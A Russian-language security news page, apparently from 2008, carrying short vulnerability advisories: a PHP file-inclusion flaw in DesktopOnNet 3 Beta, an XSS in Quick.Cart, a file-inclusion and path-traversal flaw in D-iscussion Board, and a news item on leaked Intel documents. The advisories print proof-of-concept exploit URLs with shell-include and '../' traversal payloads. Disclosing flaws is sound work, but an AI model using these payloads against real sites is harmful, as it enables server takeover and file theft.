Платный хостинг HostSpace - надежный платный хостинг в
Украине. CGI-bin, Php, MySQL, почта. Круглосуточная поддержка.
PHP-инклюдинг в DesktopOnNet
Программа: DesktopOnNet 3 Beta
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «app_path» сценариями don3_requiem.php и
frontpage.php. Удаленный пользователь может выполнить произвольный PHP сценарий
на целевой системе с привилегиями Web сервера.
Эксплоит:
http://127.0.0.1/DON3/applications/don3_requiem.don3app/
don3_requiem.php?app_path=SH3LL?
http://127.0.0.1/DON3/applications/frontpage. don3app/frontpage.php?app_path=SH3LL?
www.xakep.ru
Безопасность связи 02-06-2008
Межсайтовый скриптинг в Quick.Cart 19-09-2008 Безопасность связи Программа: Quick.Cart 3.xУязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием admin.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
В доме инженера AMD найдено более 100 секретных документов Intel 16-09-2008 Безопасность связи У любого крупного разработчика всегда найдутся материалы, которыми с удовольствием разжились бы конкуренты. Бывший инженер одной из фабрик Intel попался на выносе секретных документов после того, как нанялся на работу у AMD.Как показало расследование, в доме Бисвахомана Пани было найдено более сотни копий секретных документов Intel, включая 13 совершенно секретных с важной информацией о будущих процессорах компании. Инженер намеревалс...
PHP-инклюдинг в D-iscussion Board 15-09-2008 Безопасность связи Программа: D-iscussion Board 3.01Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «topic» сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Эксплоит:http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00... |